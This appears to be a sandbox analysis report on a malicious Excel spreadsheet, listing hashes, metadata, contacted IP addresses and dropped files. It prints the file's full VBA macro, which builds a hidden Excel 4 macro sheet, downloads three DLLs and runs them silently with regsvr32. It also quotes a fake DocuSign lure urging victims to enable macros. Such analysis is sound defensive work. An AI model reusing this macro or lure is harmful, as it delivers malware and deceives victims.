This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
There are no files for this filter
There are no files in this analysis
|
MIME Type
|
application/vnd.ms-excel
|
|
File Size
|
203.00 KB
|
|
MD5
|
34ee9111f987b903bce643f660d2d7ce
|
|
SHA1
|
a7b9d6fa34914921826fc7913e0d3ccd145ebaf2
|
|
SHA256
|
2013496fe5524988c28357245d684cdca787b47c0b3b16cae20b3222977d769b
|
|
SSDeep
|
6144:oKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgCSPofSHl8oD5j:ERq55j
|
|
ImpHash
|
-
|
|
Threat Name
|
Verdict
|
|
VB:Trojan.Valyria.5339
|
|
|
VB:Trojan.Valyria.5339
|
|
|
Creator
|
Test
|
|
Last Modified By
|
Drywhtt
|
|
Create Time
|
2015-06-05 18:17:20+00:00
|
|
Modify Time
|
2021-09-20 11:41:03+00:00
|
|
Codepage
|
ANSI_Cyrillic
|
|
Application
|
Microsoft Excel
|
|
App Version
|
16.0
|
|
Document Security
|
NONE
|
|
Titles Of Parts
|
Sheet1
|
|
scale_crop
|
False
|
|
shared_doc
|
False
|
|
CLSID
|
Control Name
|
Associated Vulnerability
|
|
{00020820-0000-0000-C000-000000000046}
|
Excel97Sheet
|
-
|
Attribute VB_Name = "Module1"
Sub auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Set Fera = Excel4IntlMacroSheets
Fera.Add.Name = "Sheet3"
Sheets("Sheet3").Visible = False
Sheets("Sheet3").Range("A1:M100").Font.Color = vbWhite
Sheets("Sheet3").Range("H24") = UserForm1.Label1.Caption
Sheets("Sheet3").Range("H25") = UserForm1.Label3.Caption
Sheets("Sheet3").Range("H26") = UserForm1.Label4.Caption
Sheets("Sheet3").Range("K17") = "=NOW()"
Sheets("Sheet3").Range("K18") = ".dat"
Sheets("Sheet3").Range("H35") = "=HALT()"
Sheets("Sheet3").Range("I9") = UserForm1.Label2.Caption
Sheets("Sheet3").Range("I10") = UserForm1.Caption
Sheets("Sheet3").Range("I11") = "JJCCBB"
Sheets("Sheet3").Range("I12") = "Byukilos"
Sheets("Sheet3").Range("G10") = "..\Xertis.dll"
Sheets("Sheet3").Range("G11") = "..\Xertis1.dll"
Sheets("Sheet3").Range("G12") = "..\Xertis2.dll"
Sheets("Sheet3").Range("I17") = "regsvr32 -silent ..\Xertis.dll"
Sheets("Sheet3").Range("I18") = "regsvr32 -silent ..\Xertis1.dll"
Sheets("Sheet3").Range("I19") = "regsvr32 -silent ..\Xertis2.dll"
Sheets("Sheet3").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet3").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet3").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet3").Range("H9") = "=REGISTER(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet3").Range("H17") = "=EXEC(I17)"
Sheets("Sheet3").Range("H18") = "=EXEC(I18)"
Sheets("Sheet3").Range("H19") = "=EXEC(I19)"
Application.Run Sheets("Sheet3").Range("H1")
End Sub
Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
Application.DisplayAlerts = False
Sheets("Sheet3").Delete
Application.DisplayAlerts = True
End Sub
|
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean
Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
If Not m_openAlreadyRan Then Workbook_Open
End Sub
Private Sub asWorkbook_Activateas()
On Error Resume Next
If m_isOpenDelayed Then
m_isOpenDelayed = False
InitWorkbook
End If
End Sub
Private Sub saWorkbook_Opensa()
On Error Resume Next
m_openAlreadyRan = True
Dim objProtectedViewWindow As ProtectedViewWindow
'
Set objProtectedViewWindow = Application.ProtectedViewWindows(Me.Name)
On Error GoTo 0
'
m_isOpenDelayed = Not (objProtectedViewWindow Is Nothing)
If Not m_isOpenDelayed Then InitWorkbook
End Sub
Private Sub ssaaInitWorkbookssaa()
On Error Resume Next
If VBA.Val(Application.Version) < 12 Then
MsgBox "This Workbook requires Excel 2007 or later!", vbCritical, "Closing"
Me.Close False
Exit Sub
End If
'
'Other code
'
'
'
End Sub
|
|
DocuSign
Your DocuSign Document is Protected
VIEW COMPLETED DOCUMENT
THE STEPS ARE REQUIRED TO FULLY DECRYPT THE DOCUMENT,
ENCRYPTED BY DOCUSIGN.
DocuSign Document Application Instruction
1. Click on “ENABLE EDITING” button to unlock the document downloaded from the Internet.
2. Click on “ENABLE CONTENT” button to perform Microsoft Exel Decryption Core to start the decryption of
the document.
Do Not Share This Email
Ths email contains a secure information Picase do not share thes email, knk, of access informaton with others
I you need to modity the document of have questions aboul the dotats in tho document, please reach out to the sender by emailing them drectly,
|
|
Name
|
ID
|
Size
|
Actions
|
|
Root\Workbook
|
1
|
176.57 KB
|
|
|
Root\_VBA_PROJECT_CUR\VBA\ThisWorkbook
|
4
|
2.94 KB
|
|
|
Root\_VBA_PROJECT_CUR\VBA\Sheet1
|
5
|
991 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\VBA\UserForm1
|
6
|
1.17 KB
|
|
|
Root\_VBA_PROJECT_CUR\VBA\Module1
|
7
|
3.68 KB
|
|
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_2
|
8
|
212 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_3
|
9
|
206 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\VBA\_VBA_PROJECT
|
10
|
3.77 KB
|
|
|
Root\_VBA_PROJECT_CUR\VBA\dir
|
11
|
864 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_0
|
12
|
1.96 KB
|
|
|
Root\_VBA_PROJECT_CUR\VBA\__SRP_1
|
13
|
138 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\UserForm1\f
|
15
|
226 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\UserForm1\o
|
16
|
272 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\UserForm1\CompObj
|
17
|
97 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\UserForm1\VBFrame
|
18
|
301 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\PROJECTwm
|
19
|
116 Bytes
|
|
|
Root\_VBA_PROJECT_CUR\PROJECT
|
20
|
603 Bytes
|
|
|
Root\SummaryInformation
|
21
|
208 Bytes
|
|
|
Root\DocumentSummaryInformation
|
22
|
240 Bytes
|
|
|
Root\CompObj
|
23
|
103 Bytes
|
|
|
URL
|
WHOIS Data
|
Reputation Status
|
Recursively Submitted
|
Actions
|
|
http://103.155.92.211
|
|
|
-
|
|
|
http://193.38.54.149
|
|
|
-
|
|
|
http://94.140.114.44
|
|
|
-
|
|
|
MIME Type
|
application/octet-stream
|
|
File Size
|
128 Bytes
|
|
MD5
|
cc90851958032b8c8bbb7b24ec6271dd
|
|
SHA1
|
e027ad2ea4049374a3b01af2e3626b667dc816bc
|
|
SHA256
|
c2d814a34b184b7cdf10e4e7a4311ff15db99326d6dd8d328b53bf9e19ccf858
|
|
SSDeep
|
3:Fl:
|
|
ImpHash
|
-
|
|
MIME Type
|
-
|
|
File Size
|
0 Bytes
|
|
MD5
|
d41d8cd98f00b204e9800998ecf8427e
|
|
SHA1
|
da39a3ee5e6b4b0d3255bfef95601890afd80709
|
|
SHA256
|
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
|
|
SSDeep
|
3::
|
|
ImpHash
|
-
|
|
MIME Type
|
application/CDFV2
|
|
File Size
|
1.50 KB
|
|
MD5
|
72f5c05b7ea8dd6059bf59f50b22df33
|
|
SHA1
|
d5af52e129e15e3a34772806f6c5fbf132e7408e
|
|
SHA256
|
1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164
|
|
SSDeep
|
3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
|
|
ImpHash
|
-
|
|
MIME Type
|
application/octet-stream
|
|
File Size
|
512 Bytes
|
|
MD5
|
bf619eac0cdf3f68d496ea9344137e8b
|
|
SHA1
|
5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
|
|
SHA256
|
076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
|
|
SSDeep
|
3::
|
|
ImpHash
|
-
|
|
Parent File
|
C:\Users\RDhJ0CNFevzX\Desktop\2013496fe5524988c28357245d684cdca787b47c0b3b16cae20b3222977d769b.xlsx.xls
|
|
MIME Type
|
image/jpeg
|
|
File Size
|
160.17 KB
|
|
MD5
|
3ece5d8e6607cf01388c97bcd206cba5
|
|
SHA1
|
20c26d178355d7d69c9f8793542075100bb284b9
|
|
SHA256
|
d36f4c20dc961f9647f933d75e97cb62ef094a2cb7ee61dd4196c60b66bdf0d2
|
|
SSDeep
|
1536:j5SieGiWm1m1m1m1m1m1m/Oooh1ccumI6wbcEpaAICcKxcRxfUBENZIt4MOrNRM1:lShOhkvHBSFHItMj8X4XBBITMtVq3
|
|
ImpHash
|
-
|
